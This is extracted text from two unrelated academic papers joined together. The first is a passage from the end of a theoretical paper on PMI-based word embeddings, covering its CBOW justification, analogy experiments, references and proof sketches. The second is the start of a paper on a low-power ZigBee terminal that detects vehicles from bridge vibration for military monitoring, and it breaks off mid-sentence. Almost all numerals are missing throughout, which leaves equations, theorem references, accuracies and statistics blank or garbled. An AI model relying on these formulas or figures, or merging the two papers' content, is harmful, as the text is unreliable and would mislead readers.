all predicted and given meanings due to theorem . , specifically sw = ‖vw‖ . connection to word vec(cbow). the cbow model in word vec posits that the probability of a word wk+ as a function of the previous k words w ,w , . . . ,wk: p ( wk+ ∣∣{wi}ki= ) ∝ exp(〈vwk+ , k k∑ i= vwi〉). this expression seems mysterious since it de- pends upon the average word vector for the previ- ous k words. we show it can be theoretically jus- tified. assume a simplified version of our model, where a small window of k words is generated as follows: sample c ∼ c, where c is a uniformly ran- dom unit vector, then sample (w ,w , . . . ,wk) ∼ exp(〈 ∑k i= vwi,c〉)/zc. furthermore, assume zc = z for any c. lemma . . in the simplified version of our model, the maximum-a-posteriori (map) estimate of c given (w ,w , . . . ,wk) is ∑k i= vwi ‖ ∑k i= vwi‖ . proof. the c maximizing p (c|w ,w , . . . ,wk) is the maximizer of p(c)p (w ,w , . . . ,wk|c). since p(c) = p(c′) for any c,c′, and we have p (w ,w , . . . ,wk|c) = exp(〈 ∑ i vwi,c〉)/z, the maximizer is clearly c = ∑k i= vwi ‖ ∑k i= vwi‖ . thus using the map estimate of ct gives essen- tially the same expression as cbow apart from the rescaling, which is often omitted due to computa- tional efficiency in empirical works. explaining relations=lines as mentioned, word analogies like “a:b::c:??” can be solved via a linear algebraic expression: argmin d ‖va −vb −vc + vd‖ , ( . ) where vectors have been normalized such that ‖vd‖ = . this suggests that the semantic rela- tionships being tested in the analogy are character- ized by a straight line, referred to earlier as rela- tions=lines. using our model we will show the following for low-dimensional embeddings: for each such relation r there is a direction µr in space such that for any word pair a,b satisfying the relation, va −vb is like µr plus some noise vector. this happens for rela- tions satisfying a certain condition described below. empirical results supporting this theory appear in section , where this linear structure is further lever- aged to slightly improve analogy solving. a side product of our argument will be a mathematical explanation of the empirically well- established superiority of low-dimensional word embeddings over high-dimensional ones in this set- ting (levy and goldberg, a). as mentioned ear- lier, the usual explanation that smaller models gen- eralize better is fallacious. we first sketch what was missing in prior attempts to prove versions of relations=lines from first principles. the basic issue is approximation er- ror: the difference between the best solution and the nd best solution to ( . ) is typically small, whereas the approximation error in the objective in the low- dimensional solutions is larger. for instance, if one uses our pmi objective, then the weighted average of the termwise error in ( . ) is %, and the expres- sion in ( . ) above contains six inner products. thus in principle the approximation error could lead to a failure of the method and the emergence of linear relationship, but it does not. prior explanations. pennington et al. ( ) try to propose a model where such linear relationships should occur by design. they posit that queen is a solution to the analogy “man:woman::king:??” be- note that this interpretation has been disputed; e.g., it is argued in levy and goldberg ( a) that ( . ) can be under- stood using only the classical connection between inner product and word similarity, using which the objective ( . ) is slightly improved to a different objective called cosmul. however, this “explanation” is still dogged by the issue of large termwise error pinpointed here, since inner product is only a rough ap- proximation to word similarity. furthermore, the experiments in section clearly support the relations=lines interpreta- tion. cause p(χ | king) p(χ | queen) ≈ p(χ | man) p(χ | woman), ( . ) where p(χ | king) denotes the conditional proba- bility of seeing word χ in a small window of text around king. relationship ( . ) is intuitive since both sides will be ≈ for gender-neutral χ like “walks” or “food”, will be > when χ is like “he, henry” and will be < when χ is like “dress, she, elizabeth.” this was also observed by levy and goldberg ( a). given ( . ), they then posit that the correct model describing word embeddings in terms of word occurrences must be a homomorphism from (<d, +) to (<+,×), so vector differences map to ratios of probabilities. this leads to the expres- sion pw,w′ = 〈vw,vw′〉 + bw + bw′, and their method is a (weighted) least squares fit for this expression. one shortcoming of this argument is that the homomorphism assumption assumes the linear relationships instead of explaining them from a more basic principle. more importantly, the empir- ical fit to the homomorphism has nontrivial approx- imation error, high enough that it does not imply the desired strong linear relationships. levy and goldberg ( b) show that empiri- cally, skip-gram vectors satisfy 〈vw,vw′〉≈ pmi(w,w′) ( . ) up to some shift. they also give an argument sug- gesting this relationship must be present if the so- lution is allowed to be very high-dimensional. un- fortunately, that argument does not extend to low- dimensional embeddings. even if it did, the issue of termwise approximation error remains. our explanation. the current paper has intro- duced a generative model to theoretically explain the emergence of relationship ( . ). however, as noted after theorem . , the issue of high approximation error does not go away either in theory or in the em- pirical fit. we now show that the isotropy of word vectors (assumed in the theoretical model and ver- ified empirically) implies that even a weak version of ( . ) is enough to imply the emergence of the ob- served linear relationships in low-dimensional em- beddings. this argument will assume the analogy in ques- tion involves a relation that obeys pennington et al.’s suggestion in ( . ). namely, for such a relation r there exists function νr(·) depending only upon r such that for any a,b satisfying r there is a noise function ξa,b,r(·) for which: p(χ | a) p(χ | b) = νr(χ) · ξa,b,r(χ) ( . ) for different words χ there is huge variation in ( . ), so the multiplicative noise may be large. our goal is to show that the low-dimensional word embeddings have the property that there is a vector µr such that for every pair of words a,b in that relation, va − vb = µr + noise vector, where the noise vector is small. taking logarithms of ( . ) results in: log ( p(χ | a) p(χ | b) ) = log(νr(χ)) + ζa,b,r(χ) ( . ) theorem . implies that the left-hand side sim- plifies to log ( p(χ|a) p(χ|b) ) = d 〈vχ,va −vb〉 + �a,b(χ) where � captures the small approximation errors in- duced by the inexactness of theorem . . this adds yet more noise! denoting by v the n × d matrix whose rows are the vχ vectors, we rewrite ( . ) as: v (va −vb) = d log(νr) + ζ′a,b,r ( . ) where log(νr) in the element-wise log of vector νr and ζ′a,b,r = d(ζa,b,r − �a,b,r) is the noise. in essence, ( . ) shows that va−vb is a solution to a linear regression in d variables and m constraints, with ζ′a,b,r being the “noise.” the design matrix in the regression is v , the matrix of all word vectors, which in our model (as well as empirically) satisfies an isotropy condition. this makes it random-like, and thus solving the regression by left-multiplying by v †, the pseudo-inverse of v , ought to “denoise” effectively. we now show that it does. our model assumed the set of all word vectors satisfies bulk properties similar to a set of gaus- sian vectors. the next theorem will only need the following weaker properties. ( ) the smallest non- zero singular value of v is larger than some constant c times the quadratic mean of the singular values, namely, ‖v‖f/ √ d. empirically we find c ≈ / holds; see section . ( ) the left singular vectors behave like random vectors with respect to ζ′a,b,r, namely, have inner product at most c ‖ζ′a,b,r‖/ √ n with ζ′a,b,r, for some constant c . ( ) the max norm of a row in v is o( √ d). the proof is included in the appendix. theorem . (noise reduction). under the condi- tions of the previous paragraph, the noise in the dimension-reduced semantic vector space satisfies ‖ζ̄a,b,r‖ . ‖ζ′a,b,r‖ √ d n . as a corollary, the relative error in the dimension- reduced space is a factor of √ d/n smaller. experimental verification in this section, we provide experiments empirically supporting our generative model. corpus. all word embedding vectors are trained on the english wikipedia (march dump). it is pre-processed by standard approach (removing non- textual elements, sentence splitting, and tokeniza- tion), leaving about billion tokens. words that appeared less than times in the corpus are ig- nored, resulting in a vocabulary of , . the co- occurrence is then computed using windows of tokens to each side of the focus word. training method. our embedding vectors are trained by optimizing the sn objective using ada- grad (duchi et al., ) with initial learning rate of . and iterations. the pmi objective derived from ( . ) was also used. sn has average (weighted) term-wise error of %, and pmi has %. we ob- served that sn vectors typically fit the model bet- ter and have better performance, which can be ex- plained by larger errors in pmi, as implied by theo- rem . . so, we only report the results for sn. for comparison, glove and two variants of word vec (skip-gram and cbow) vectors are trained. glove’s vectors are trained on the same co- occurrence as sn with the default parameter values. word vec vectors are trained using a window size of , with other parameters set to default values. http://nlp.stanford.edu/projects/glove/ https://code.google.com/p/word vec/ . . partition function value p e rc e n ta g e (a) sn . . partition function value (b) glove . . partition function value (c) cbow . . partition function value (d) skip-gram figure : the partition function zc. the figure shows the histogram of zc for random vectors c of appropriate norm, as defined in the text. the x-axis is normalized by the mean of the values. the values zc for different c concentrate around the mean, mostly in [ . , . ]. this concentration phenomenon is predicted by our analysis. natural logarithm of frequency s q u a re d n o rm figure : the linear relationship between the squared norms of our word vectors and the logarithms of the word frequencies. each dot in the plot corresponds to a word, where x-axis is the natural logarithm of the word fre- quency, and y-axis is the squared norm of the word vec- tor. the pearson correlation coefficient between the two is . , indicating a significant linear relationship, which strongly supports our mathematical prediction, that is, equation ( . ) of theorem . . . model verification experiments were run to test our modeling assump- tions. first, we tested two counter-intuitive proper- ties: the concentration of the partition function zc for different discourse vectors c (see theorem . ), and the random-like behavior of the matrix of word embeddings in terms of its singular values (see the- orem . ). for comparison we also tested these properties for word vec and glove vectors, though they are trained by different objectives. finally, we tested the linear relation between the squared norms of our word vectors and the logarithm of the word frequencies, as implied by theorem . . partition function. our theory predicts the counter-intuitive concentration of the partition func- tion zc = ∑ w′ exp(c >vw′ ) for a random discourse vector c (see lemma . ). this is verified empiri- cally by picking a uniformly random direction, of norm ‖c‖ = /µw, where µw is the average norm of the word vectors. figure (a) shows the histogram of zc for such randomly chosen c’s for our vectors. the values are concentrated, mostly in the range [ . , . ] times the mean. concentration is also observed for other types of vectors, especially for glove and cbow. isotropy with respect to singular values. our theoretical explanation of relations=lines as- sumes that the matrix of word vectors behaves like a random matrix with respect to the properties of singular values. in our embeddings, the quadratic mean of the singular values is . , while the min- imum non-zero singular value of our word vectors is . therefore, the ratio between them is a small constant, consistent with our model. the ratios for glove, cbow, and skip-gram are . , . , and . , respectively, which are also small constants. squared norms v.s. word frequencies. figure shows a scatter plot for the squared norms of our vectors and the logarithms of the word frequencies. a linear relationship is observed (pearson correla- tion . ), thus supporting theorem . . the cor- relation is stronger for high frequency words, pos- sibly because the corresponding terms have higher weights in the training objective. this correlation is much weaker for other types note that our model uses the inner products between the discourse vectors and word vectors, so it is invariant if the dis- course vectors are scaled by s while the word vectors are scaled by /s for any s > . therefore, one needs to choose the norm of c properly. we assume ‖c‖µw = √ d/κ ≈ for a constant κ = so that it gives a reasonable fit to the predicted dynamic range of word frequencies according to our theory; see model details in section . relations sn glove cbow skip-gram g semantic . . . . syntactic . . . . total . . . . m adjective . . . . noun . . . . verb . . . . total . . . . table : the accuracy on two word analogy task testbeds: g (the google testbed); m (the msr testbed). per- formance is close to the state of the art despite using a generative model with provable properties. of word embeddings. this is possibly because they have more free parameters (“knobs to turn”), which imbue the embeddings with other properties. this can also cause the difference in the concentration of the partition function for the two methods. . performance on analogy tasks we compare the performance of our word vec- tors on analogy tasks, specifically the two testbeds google and msr (mikolov et al., a; mikolov et al., c). the for- mer contains semantic questions such as “man:woman::king:??”, and syntactic ones such as “run:runs::walk:??.” the latter has syntactic questions for adjectives, nouns, and verbs. to solve these tasks, we use linear algebraic queries. that is, first normalize the vectors to unit norm and then solve “a:b::c:??” by argmin d ‖va −vb −vc + vd‖ . ( . ) the algorithm succeeds if the best d happens to be correct. the performance of different methods is pre- sented in table . our vectors achieve performance comparable to the state of art on semantic analogies (similar accuracy as glove, better than word vec). on syntactic tasks, they achieve accuracy . lower than glove and skip-gram, while cbow typically outperforms the others. the reason is probably one can instead use the cosmul in (levy and goldberg, a), which increases the accuracy by about %. but it is not linear while our focus here is the linear algebraic structure. it was earlier reported that skip-gram outperforms cbow (mikolov et al., a; pennington et al., ). this may be due to the different training data sets and hyperparame- ters used. relation cap-com cap-wor adj-adv opp st . ± . . ± . . ± . . ± . nd . ± . . ± . . ± . . ± . table : the verification of relation directions on se- mantic and syntactic relations in the google testbed. relations include cap-com: capital-common-countries; cap-wor: capital-world; adj-adv: gram -adjective-to- adverb; opp: gram -opposite. for each relation, take vab = va − vb for pairs (a,b) in the relation, and then calculate the top singular vectors of the matrix formed by these vab’s. the row with label “ st”/“ nd” shows the co- sine similarities of individual vab to the st/ nd singular vector (the mean and standard deviation). that our model ignores local word order, whereas the other models capture it to some extent. for ex- ample, a word “she” can affect the context by a lot and determine if the next word is “thinks” rather than “think”. incorporating such linguistic features in the model is left for future work. . verifying relations=lines the theory in section predicts the existence of a direction for a relation, whereas earlier levy and goldberg ( a) had questioned if this phe- nomenon is real. the experiment uses the analogy testbed, where each relation is tested using or more analogies. for each relation, we take the set of vectors vab = va −vb where the word pair (a,b) satisfies the relation. then calculate the top singu- lar vectors of the matrix formed by these vab’s, and compute the cosine similarity (i.e., normalized in- ner product) of individual vab to the singular vec- tors. we observed that most (va − vb)’s are corre- lated with the first singular vector, but have inner products around with the second singular vector. over all relations, the average projection on the first singular vector is . (semantic: . ; syntactic: . ), and the average on the second singular vector is . . for example, table shows the mean sim- ilarities and standard deviations on the first and sec- ond singular vectors for relations. similar results are also obtained for word embedings by glove and word vec. therefore, the first singular vector can be taken as the direction associated with this relation, while the other components are like random noise, in line with our model. sn glove cbow skip-gram w/o rd . . . . rd(k = ) . . . . rd(k = ) . . . . rd(k = ) . . . . table : the accuracy of the rd algorithm (i.e., the cheater method) on the google testbed. the rd al- gorithm is described in the text. for comparison, the row “w/o rd” shows the accuracy of the old method without using rd. cheating solver for analogy testbeds. the above linear structure suggests a better (but cheating) way to solve the analogy task. this uses the fact that the same semantic relationship (e.g., masculine- feminine, singular-plural) is tested many times in the testbed. if a relation r is represented by a direction µr then the cheating algorithm can learn this direc- tion (via rank svd) after seeing a few examples of the relationship. then use the following method of solving “a:b::c:??”: look for a word d such that vc−vd has the largest projection on µr, the relation direction for (a,b). this can boost success rates by about %. the testbed can try to combat such cheating by giving analogy questions in a random order. but the cheating algorithm can just cluster the presented analogies to learn which of them are in the same relation. thus the final algorithm, named analogy solver with relation direction (rd), is: take all vec- tors va − vb for all the word pairs (a,b) presented among the analogy questions and do k-means clus- tering on them; for each (a,b), estimate the rela- tion direction by taking the first singular vector of its cluster, and substitute that for va −vb in ( . ) when solving the analogy. table shows the performance on google with different values of k; e.g. using our sn vectors and k = leads to . accuracy. thus future designers of analogy testbeds should re- member not to test the same relationship too many times! this still leaves other ways to cheat, such as learning the directions for interesting semantic rela- tions from other collections of analogies. non-cheating solver for analogy testbeds. now we show that even if a relationship is tested only once in the testbed, there is a way to use the above structure. given “a:b::c:??,” the solver first finds the top nearest neighbors of a and those of sn glove cbow skip-gram w/o rd-nn . . . . rd-nn (k = ) . . . . rd-nn (k = ) . . . . rd-nn (k = ) . . . . table : the accuracy of the rd-nn algorithm on the google testbed. the algorithm is described in the text. for comparison, the row “w/o rd-nn” shows the accu- racy of the old method without using rd-nn. b, and then finds among these neighbors the top k pairs (a′,b′) so that the cosine similarities between va′ −vb′ and va −vb are largest. finally, the solver uses these pairs to estimate the relation direction (via rank svd), and substitute this (corrected) estimate for va−vb in ( . ) when solving the analogy. this al- gorithm is named analogy solver with relation direc- tion by nearest neighbors (rd-nn). table shows its performance, which consistently improves over the old method by about %. conclusions a simple generative model has been introduced to explain the classical pmi based word embedding models, as well as recent variants involving energy- based models and matrix factorization. the model yields an optimization objective with essentially “no knobs to turn”, yet the embeddings lead to good per- formance on analogy tasks, and fit other predictions of our generative model. a model with fewer knobs to turn should be seen as a better scientific explana- tion (occam’s razor), and certainly makes the em- beddings more interpretable. the spatial isotropy of word vectors is both an assumption in our model, and also a new empir- ical finding of our paper. we feel it may help with further development of language models. it is important for explaining the success of solv- ing analogies via low dimensional vectors (rela- tions=lines). it also implies that semantic rela- tionships among words manifest themselves as spe- cial directions among word embeddings (section ), which lead to a cheater algorithm for solving anal- ogy testbeds. our model is tailored to capturing semantic sim- ilarity, more akin to a log-linear dynamic topic model. in particular, local word order is unim- portant. designing similar generative models (with provable and interpretable properties) with linguistic features is left for future work. acknowledgements we thank the editors of tacl for granting a special relaxation of the page limit for our paper. we thank yann lecun, christopher d. manning, and sham kakade for helpful discussions at various stages of this work. this work was supported in part by nsf grants ccf- , dms- , simons investiga- tor award, simons collaboration grant, and onr- n - - - . tengyu ma was supported in addition by simons award in theoretical computer science and ibm phd fellowship. references jacob andreas and dan klein. . when and why are log-linear models self-normalizing? in proceedings of the annual meeting of the north american chapter of the association for computational linguistics. sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . a latent variable model approach to pmi-based word embeddings. technical report, arxiv. http://arxiv.org/abs/ . . sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . linear al- gebraic structure of word senses, with applica- tions to polysemy. technical report, arxiv. http://arxiv.org/abs/ . . david belanger and sham m. kakade. . a linear dynamical system model for text. in proceedings of the nd international conference on machine learn- ing. yoshua bengio, holger schwenk, jean-sébastien senécal, fréderic morin, and jean-luc gauvain. . neural probabilistic language models. in innovations in machine learning. fischer black and myron scholes. . the pricing of options and corporate liabilities. journal of political economy. david m. blei and john d. lafferty. . dynamic topic models. in proceedings of the rd international conference on machine learning. david m. blei. . probabilistic topic models. com- munication of the association for computing machin- ery. kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics. shay b. cohen, karl stratos, michael collins, dean p. foster, and lyle ungar. . spectral learning of latent-variable pcfgs. in proceedings of the th annual meeting of the association for computational linguistics: long papers-volume . ronan collobert and jason weston. a. a uni- fied architecture for natural language processing: deep neural networks with multitask learning. in proceed- ings of the th international conference on machine learning. ronan collobert and jason weston. b. a uni- fied architecture for natural language processing: deep neural networks with multitask learning. in proceed- ings of the th international conference on machine learning. scott c. deerwester, susan t dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. journal of the american society for information science. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research. john rupert firth. . a synopsis of linguistic theory. amir globerson, gal chechik, fernando pereira, and naftali tishby. . euclidean embedding of co- occurrence data. journal of machine learning re- search. tatsunori b. hashimoto, david alvarez-melis, and tommi s. jaakkola. . word embeddings as met- ric recovery in semantic spaces. transactions of the association for computational linguistics. thomas hofmann. . probabilistic latent semantic analysis. in proceedings of the fifteenth conference on uncertainty in artificial intelligence. daniel hsu, sham m. kakade, and tong zhang. . a spectral algorithm for learning hidden markov models. journal of computer and system sciences. omer levy and yoav goldberg. a. linguistic regu- larities in sparse and explicit word representations. in proceedings of the eighteenth conference on compu- tational natural language learning. omer levy and yoav goldberg. b. neural word em- bedding as implicit matrix factorization. in advances in neural information processing systems. andrew l. maas, raymond e. daly, peter t. pham, dan huang, andrew y. ng, and christopher potts. . learning word vectors for sentiment analysis. in the th annual meeting of the association for computa- tional linguistics. yariv maron, michael lamar, and elie bienenstock. . sphere embedding: an application to part-of- speech induction. in advances in neural information processing systems. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. proceedings of the international conference on learning representations. tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems. tomas mikolov, wen-tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies. andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of the th international conference on machine learning. christos h. papadimitriou, hisao tamaki, prabhakar raghavan, and santosh vempala. . latent se- mantic indexing: a probabilistic analysis. in proceed- ings of the th acm sigact-sigmod-sigart sym- posium on principles of database systems. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. proceedings of the empiricial methods in natural language processing. douglas l. t. rohde, laura m. gonnerman, and david c. plaut. . an improved model of seman- tic similarity based on lexical co-occurence. commu- nication of the association for computing machinery. david e. rumelhart, geoffrey e. hinton, and james l. mcclelland, editors. . parallel distributed pro- cessing: explorations in the microstructure of cogni- tion. david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . learning representations by back- propagating errors. cognitive modeling. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research. a proof sketches here we provide the proof sketches, while the com- plete proof can be found in the full version (arora et al., ). proof sketch of theorem . let w and w′ be two arbitrary words. let c and c′ denote two consecutive context vectors, where c ∼ c and c′|c is defined by the markov kernel p(c′ | c). we start by using the law of total expectation, in- tegrating out the hidden variables c and c′: p(w,w′) = e c,c′ [ pr[w,w′|c,c′] ] = e c,c′ [p(w|c)p(w′|c′)] = e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ ] (a. ) an expectation like (a. ) would normally be dif- ficult to analyze because of the partition functions. however, we can assume the inequality ( . ), that is, the partition function typically does not vary much for most of context vectors c. let f be the event that both c and c′ are within ( ± �z)z. then by ( . ) and the union bound, event f happens with proba- bility at least − exp(−Ω(log n)). we will split the right-hand side (rhs) of (a. ) into the parts ac- cording to whether f happens or not. rhs of (a. ) = e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ f ] ︸ ︷︷ ︸ t + e c,c′ [ exp(〈vw,c〉) zc exp(〈vw′,c′〉) zc′ f̄ ] ︸ ︷︷ ︸ t (a. ) where f̄ denotes the complement of event f and f and f̄ denote indicator functions for f and f̄ , respectively. when f happens, we can replace zc by z with a ± �z factor loss: the first term of the rhs of (a. ) equals to t = ±o(�z) z e c,c′ [ exp(〈vw,c〉) exp(〈vw′,c′〉) f ] (a. ) on the other hand, we can use e[ f̄ ] = pr[f̄] ≤ exp(−Ω(log n)) to show that the second term of rhs of (a. ) is negligible, |t | = exp(−Ω(log . n)) . (a. ) this claim must be handled somewhat carefully since the rhs does not depend on d at all. briefly, the reason this holds is as follows: in the regime when d is small ( √ d = o(log n)), any word vec- tor vw and discourse c satisfies that exp(〈vw,c〉) ≤ exp(‖vw‖) = exp(o( √ d)), and since e[ f̄ ] = exp(−Ω(log n)), the claim follows directly; in the regime when d is large ( √ d = Ω(log n)), we can use concentration inequalities to show that except with a small probability exp(−Ω(d)) = exp(−Ω(log n)), a uniform sample from the sphere behaves equivalently to sampling all of the coor- dinates from a standard gaussian distribution with mean and variance d , in which case the claim is not too difficult to show using gaussian tail bounds. therefore it suffices to only consider (a. ). our model assumptions state that c and c′ cannot be too different. we leverage that by rewriting (a. ) a little, and get that it equals t = ±o(�z) z e c [ exp(〈vw,c〉) e c′|c [ exp(〈vw′,c′〉) ] ] = ±o(�z) z e c [exp(〈vw,c〉)a(c)] (a. ) where a(c) := e c′|c [ exp(〈vw′,c′〉) ] . we claim that a(c) = ( ± o(� )) exp(〈vw′,c〉). doing some al- gebraic manipulations, a(c) = exp(〈vw′,c〉) e c′|c [ exp(〈vw′,c′ − c〉) ] . furthermore, by our model assumptions, ‖c−c′‖≤ � / √ d. so 〈vw,c− c′〉≤ ‖vw‖‖c− c′‖ = o(� ) and thus a(c) = ( ± o(� )) exp(〈vw′,c〉). plug- ging the simplification of a(c) to (a. ), t = ±o(�z) z e[exp(〈vw + vw′,c〉)]. (a. ) since c has uniform distribution over the sphere, the random variable 〈vw + vw′,c〉 has distribution pretty similar to gaussian distribution n( ,‖vw + vw′‖ /d), especially when d is relatively large. ob- serve that e[exp(x)] has a closed form for gaussian random variable x ∼n( ,σ ), e[exp(x)] = ∫ x σ √ π exp(− x σ ) exp(x)dx = exp(σ / ) . (a. ) bounding the difference between 〈vw + vw′,c〉 from gaussian random variable, we can show that for � = õ( /d), e[exp(〈vw + vw′,c〉)] = ( ± �) exp ( ‖vw + vw′‖ d ) . (a. ) therefore, the series of simplifica- tion/approximation above (concretely, combining equations (a. ), (a. ), (a. ), (a. ), and (a. )) lead to the desired bound on log p(w,w′) for the case when the window size q = . the bound on log p(w) can be shown similarly. proof sketch of lemma . note that for fixed c, when word vectors have gaussian priors assumed as in our model, zc = ∑ w exp(〈vw,c〉) is a sum of independent random variables. we first claim that using proper concentration of measure tools, it can be shown that the vari- ance of zc are relatively small compared to its mean evw [zc], and thus zc concentrates around its mean. note this is quite non-trivial: the ran- dom variable exp(〈vw,c〉) is neither bounded nor subgaussian/sub-exponential, since the tail is ap- proximately inverse poly-logarithmic instead of in- verse exponential. in fact, the same concentration phenomenon does not happen for w. the occur- rence probability of word w is not necessarily con- centrated because the ` norm of vw can vary a lot in our model, which allows the frequency of the words to have a large dynamic range. so now it suffices to show that evw [zc] for differ- ent c are close to each other. using the fact that the word vector directions have a gaussian distribution, evw [zc] turns out to only depend on the norm of c (which is equal to ). more precisely, e vw [zc] = f(‖c‖ ) = f( ) (a. ) where f is defined as f(α) = nes[exp(s α/ )] and s has the same distribution as the norms of the word vectors. we sketch the proof of this. in our model, vw = sw · v̂w, where v̂w is a gaussian vector with identity covariance i. then e vw [zc] = n e vw [exp(〈vw,c〉)] = n e sw [ e vw|sw [exp(〈vw,c〉) | sw] ] where the second line is just an application of the law of total expectation, if we pick the norm of the (random) vector vw first, followed by its direction. conditioned on sw, 〈vw,c〉 is a gaussian random variable with variance ‖c‖ s w, and therefore using similar calculation as in (a. ), we have e vw|sw [exp(〈vw,c〉) | sw] = exp(s ‖c‖ / ) . hence, evw [zc] = nes[exp(s ‖c‖ / )] as needed. proof of theorem . the proof uses the standard analysis of linear regression. let v = pΣqt be the svd of v and let σ , . . . ,σd be the left singular val- ues of v (the diagonal entries of Σ). for notational ease we omit the subscripts in ζ̄ and ζ′ since they are not relevant for this proof. since v † = qΣ− pt and thus ζ̄ = v †ζ′ = qΣ− ptζ′, we have ‖ζ̄‖ ≤ σ− d ‖p tζ′‖ . (a. ) we claim σ− d ≤ √ c n . (a. ) indeed, ∑d i= σ i = o(nd), since the average squared norm of a word vector is d. the claim then follows from the first assumption. furthermore, by the second assumption, ‖ptζ′‖∞ ≤ c √n‖ζ ′‖ , so ‖ptζ′‖ ≤ c d n ‖ζ′‖ . (a. ) plugging (a. ) and (a. ) into (a. ), we get ‖ζ̄‖ ≤ √ c n √ c d n ‖ζ′‖ = c √ d √ c n ‖ζ′‖ as desired. the last statement follows because the norm of the signal, which is d log(νr) originally and is v †d log(νr) = va−vb after dimension reduction, also gets reduced by a factor of √ n. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , design of a vibration detection terminal guoshao chen school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com fei xu school of computer science and engineering xi’an technological university xi’an, china e-mail: xinfei @qq.com abstract—by detecting the vibration of bridge deck, the information of passing vehicles can be obtained indirectly, which is of great significance to grasp the dynamics of the enemy. in this paper, a micro-power wireless vibration detection terminal is designed. in order to reduce the overall power consumption of the terminal, which use two sensors, one is spring switch and another is acceleration sensor. when no vehicle passes by, the terminal is in a dormant state. when a vehicle passes by, the spring switch wakes up the cpu and the acceleration sensor to collect data. zigbee network is used for data transmission, which has the advantages of low power consumption and ad hoc network. experiments show that the average power consumption of the terminal is less than mw. if the terminal is powered by . v, ah lithium battery, in theory, it can work for at least two years. keywords-vibration detection; zigbee; micro-power consumption i. introduction in the national defense and military affairs, the detection of passing vehicles in a specific area is of great significance for understanding each other's dynamics. the monitoring of bridge vibration can be more convenient to monitor vehicle dynamics. considering the concealment, destructiveness and inconvenience of construction, this terminal uses wireless communication, battery power supply and micro-power design. common wireless communication methods include bluetooth technology, wi-fi technology, gprs, zigbee and so on. because of the low power consumption of zigbee network and autonomous network, this paper chooses zigbee network. in order to achieve low power consumption, this paper considers two aspects, one is sensor power consumption, the other is processor power consumption. there are two sensors, spring switch and acceleration sensor. if there is no vehicle passing, the system will sleep deeply to save power. when there is a vehicle passing, the spring switch will wake up the cpu and the acceleration sensor will start collecting data. with regard to processor power consumption, the terminal uses cc chip for zigbee communication. because the chip integrates mcs core processors, the power consumption is reduced without additional processors. the processor computational ability is relatively low, so the calculation of signal filtering and recognition is completed by the server. the detection terminal is responsible for signal acquisition and communication tasks. in this paper, a micro-power vehicle vibration detection terminal is designed, which uses dual sensors to reduce power consumption, zigbee wireless communication and battery power supply. at the same time, the communication reliability is guaranteed and the low power consumption is taken into account by waking up the communication at a fixed time. the detection terminal can meet the requirements of long-term maintenance-free work. international journal of advanced network, monitoring and controls volume , no. , ii. principle when vehicles pass the bridge, the vibration caused by the vehicles pass the bridge deck is violently than that pass the ground. therefore, this paper obtains vehicle information by detecting the vibration of the bridge deck. when there is no vehicle passing, the detection terminal is in deep sleep state, cpu sleep, acceleration sensor and data memory power off, thus saving electricity. once a vehicle passes by, the bridge vibration triggers the spring switch, wakes up the cpu, the switch opens, so the acceleration sensor starts to detect the bridge deck vibration amplitude, and the data is stored in the memory. when zigbee network transmits data, it needs enough routing nodes to be awakened. therefore, in order to ensure that zigbee network works simultaneously, the terminal uses the method of periodic wake-up. during the wake-up period, data is transmitted to the server for processing and identification. iii. low power implementation in order to meet the battery power supply, maintenance-free long-term use, the terminal must reduce power consumption. this paper solves the problem of low power consumption from three aspects: hardware, communication and software. the hardware is designed with dual sensors, low power cpu, power switch and unnecessary equipment shut down during sleep. zigbee is used in communication, because of its advantages of ad hoc network, it can achieve low power relay transmission of data. in order to achieve low power consumption, to not lose information, on software, data acquisition using external interrupt mode, communication using timing wake-up mode. iv. hardware architecture figure . hardware structure is shown figure . switch structure the overall hardware structure is shown in figure . the spring switch is connected to the external interruption pin of the cpu. when no vehicle passes by, the spring switch breaks the power, no current passes through, and the power consumption of the spring switch is zero. when a vehicle passes by, the spring switch triggers the interruption and wakes up the cpu. the structure of the spring switch is shown in figure . the center position is the wire and the surrounding is the spring. the vibration causes the short circuit between the spring and the wire, thus triggering the external interruption of the cpu. vibration sensor adopts three-axis acceleration sensor. when the cpu is dormant, the vibration sensor is international journal of advanced network, monitoring and controls volume , no. , disconnected to save power. when the cpu is awakened, the acceleration sensor is energized and starts to work. the clock is powered by a single battery using a ds chip. the memory uses at df to store the data of acceleration sensor temporarily, waiting for the arrival of the next communication cycle. the battery uses a disposable lithium battery with a capacity of ah and a voltage of . v. the communication adopts zigbee wireless mode. in order to save power, instead of increasing the cpu, the data acquisition and communication are carried out by using the single chip microprocessor core integrated with cc . the power supply control is realized by electronic programmable switch adg , which can realize the maximum ma current output capacity, short switching time and low power consumption. v. overview of zigbee network establishment establishing a complete zigbee mesh network consists of two steps: network initialization and node joining the network. there are two steps for a node to join the network: to connect to the network through a coordinator and to access the network through an existing parent node. a. initialize network coordinator firstly, it judges whether the node is a ffd node, and then it judges whether the ffd node has a coordinator in other networks or in other networks. through active scanning, send a beacon request command, and then set a scan duration . if no beacon is detected during the scan period, then ffd has no coordinator in its pos, then it can establish its own zigbee network, and as the coordinator of this network, it generates beacons continuously and extensively. broadcast. in a network, there is only one coordinator. initialize network coordinators shown in figure . figure . initialize network coordinator b. channel scanning process it includes two processes: energy scanning and active scanning. firstly, it detects the energy of the designated channel or the default 